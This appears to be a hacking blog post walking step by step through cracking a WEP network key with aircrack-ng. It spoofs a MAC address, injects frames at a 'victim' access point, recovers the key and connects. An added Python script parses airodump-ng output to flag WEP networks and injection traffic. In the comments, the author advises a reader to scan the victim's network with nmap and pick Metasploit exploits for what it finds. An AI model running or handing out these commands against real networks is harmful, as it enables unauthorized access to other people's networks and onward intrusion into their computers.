Wireless – aircrack-ng wep

Cracking a WEP authentication key using BackTrack 5R1

1. Disable monitor mode on the wireless interface.
2. Disable the wireless interface.
3. Spoof your mac-address.
4. Restart monitor mode and the wireless interface.

root@bt:~# airmon-ng stop (interface)
root@bt:~# ifconfig (interface) down
root@bt:~# macchanger --mac 00:11:22:33:44:55 (interface)
root@bt:~# airmon-ng start (interface)

5. Start airodump-ng to see a list of the wireless networks around you. When you see the one you want, hit Ctrl+C to stop the listing, then highlight and copy the full line for the network you want to crack.

Airodump-ng captures raw 802.11 frames and is particularly suited to collecting WEP IVs (initialization vectors) for later use with aircrack-ng.

root@bt:~# airodump-ng (interface)

6. Using the line copied in step 5, enter the channel, a file name (e.g. wep), the BSSID (the victim's MAC address) and your interface:

root@bt:~# airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

Example: airodump-ng -c 6 -w /root/WEP/wepdump --bssid 00:01:04:06:01:02 wlan0

7. Open another terminal window and start aireplay-ng. Aireplay-ng injects frames; its main job here is to generate the traffic that aircrack-ng will later use to crack the WEP key.

The ESSID is the access point's SSID name. After pressing Enter you should see an “Association successful” message followed by a smiley face.

root@bt:~# aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

8. Generate more traffic so that enough data is collected sooner:

root@bt:~# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

9. You should now be collecting data that contains the key. This can take a long time. Go back to the first terminal window and look at the column called “#Data”; it needs to go above 10,000, which should give you enough data to crack the key.

Once you reach 10,000+:

root@bt:~# aircrack-ng -b (bssid) (file name-01.cap)

Example (airodump-ng appends -01 to the file name given with -w): aircrack-ng -b 00:01:04:06:01:02 /root/WEP/wepdump-01.cap

10. The Key!

KEY FOUND! [ A7:24:47:AB:C4:47:C2:14:EE:78:14:54:BB ]
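As an added example (not code from the original post or from the aircrack-ng project), the following Python script reads the CSV file that airodump-ng writes next to the .cap when you pass -w (e.g. wepdump-01.csv), lists every access point still running WEP, notes whether its IV count has crossed the 10,000 mark the walkthrough cites, and names the client sending it the most frames, which is what the traffic generation of step 8 looks like from the network owner's side. The sample CSV is constructed; the column layout follows airodump-ng's CSV output as I know it, so check the header line of your own file before relying on the column indices.

```python
"""Inventory WEP access points from an airodump-ng CSV file and flag the
symptoms a defender would care about: an AP that is still on WEP, an IV
count past the ~10,000 mark, and one client pushing a very large number of
frames at that AP (the signature of a replay/injection run)."""
import csv
import io

# Constructed sample in the airodump-ng CSV layout: AP table first, a blank
# line, then the station table. Values are made up for this example.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:01:04:06:01:02, 2012-01-01 10:00:00, 2012-01-01 10:20:00,  6,  54, WEP , WEP,    , -40,      900,    12345,   0.  0.  0.  0,   6, lab-ap, 
AA:BB:CC:DD:EE:01, 2012-01-01 10:00:00, 2012-01-01 10:20:00, 11,  54, WPA2, CCMP, PSK, -55,      880,        0,   0.  0.  0.  0,   8, homewifi, 
AA:BB:CC:DD:EE:02, 2012-01-01 10:00:00, 2012-01-01 10:20:00,  1,  54, WEP , WEP,    , -70,      300,      240,   0.  0.  0.  0,   5, guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2012-01-01 10:05:00, 2012-01-01 10:20:00, -30,    15000, 00:01:04:06:01:02, lab-ap
DE:AD:BE:EF:00:01, 2012-01-01 10:06:00, 2012-01-01 10:19:00, -50,      120, 00:01:04:06:01:02, lab-ap
"""


def _split_sections(text):
    """Return (ap_rows, station_rows) as lists of stripped string fields.
    airodump-ng separates the two tables with a blank line and a new header."""
    aps, stations, current = [], [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        row = [field.strip() for field in row]
        if not any(row):          # blank separator line
            continue
        if row[0] == "BSSID":     # AP table header
            current = aps
            continue
        if row[0] == "Station MAC":  # station table header
            current = stations
            continue
        if current is not None:
            current.append(row)
    return aps, stations


def parse_airodump_csv(text):
    """Pick the fields this report needs out of each table by column index."""
    ap_rows, st_rows = _split_sections(text)
    aps = [
        {"bssid": r[0], "channel": int(r[3]), "privacy": r[5],
         "ivs": int(r[10]), "essid": r[13]}
        for r in ap_rows if len(r) >= 14
    ]
    stations = [
        {"mac": r[0], "packets": int(r[4]), "bssid": r[5]}
        for r in st_rows if len(r) >= 6
    ]
    return aps, stations


def wep_report(aps, stations, iv_threshold=10000):
    """One entry per WEP access point: whether its IV count has reached the
    threshold the walkthrough treats as sufficient to recover the key, and
    which associated client has sent it the most frames."""
    report = []
    for ap in aps:
        if "WEP" not in ap["privacy"]:
            continue
        clients = [s for s in stations if s["bssid"] == ap["bssid"]]
        busiest = max(clients, key=lambda s: s["packets"], default=None)
        report.append({
            "bssid": ap["bssid"], "essid": ap["essid"], "channel": ap["channel"],
            "ivs": ap["ivs"],
            "crackable": ap["ivs"] >= iv_threshold,
            "busiest_station": busiest["mac"] if busiest else None,
            "busiest_packets": busiest["packets"] if busiest else 0,
        })
    return report


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for entry in wep_report(aps, stations):
        flag = "IVs past threshold" if entry["crackable"] else "IVs below threshold"
        print(f"{entry['bssid']} ({entry['essid']}, ch {entry['channel']}): "
              f"WEP, {entry['ivs']} IVs, {flag}; busiest client "
              f"{entry['busiest_station']} with {entry['busiest_packets']} frames")
```

Run it against a real capture by replacing SAMPLE_CSV with the contents of your own wepdump-01.csv; the WPA2 network in the sample is deliberately left out of the report, and the lab AP shows both a past-threshold IV count and a single client with an outsized frame count.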

11. To connect, stop all of the running WEP cracking programs, then stop monitor mode on the wireless interface.

root@bt:~# airmon-ng stop (interface)
root@bt:~# ifconfig (interface) down
root@bt:~# ifconfig (interface) up

12. Open Wicd Network Manager (Applications / Internet / Wicd Network Manager) and find the SSID whose WEP key you cracked.
Open Properties, pull down the encryption settings, choose WEP Shared/Restricted and enter the found key as shown below.


OK – Properties will close – Click Connect.


Command summary:

airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

airodump-ng (interface)

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

aircrack-ng -b (bssid) (file name-01.cap)

3 thoughts on “Wireless – aircrack-ng wep”

  1. A question: say you’ve cracked the victim’s wireless pwd, can you infiltrate the victim’s computer from there onwards? If possible, how do you go about doing it? Thanks dude, you’re a genius!

    1. Hi Gabriel, thanks for the comment. In a lab environment, once the WEP pwd is gained and you have connected, you could scan this network with nmap:

      root@bt:~/tor# nmap -sC -sT -v --open (target network)
      This will show you all hosts and open services; then look at each open port and find an exploit for that service. Metasploit should have one or two?

      Another long-winded way would be to poison DNS: http://vishnuvalentino.com/hacking-tutorial/social-engineering-tabnabbing-attack-ettercap-local-dns-poisoning/

      Thanks for the support, hope you enjoy the site.
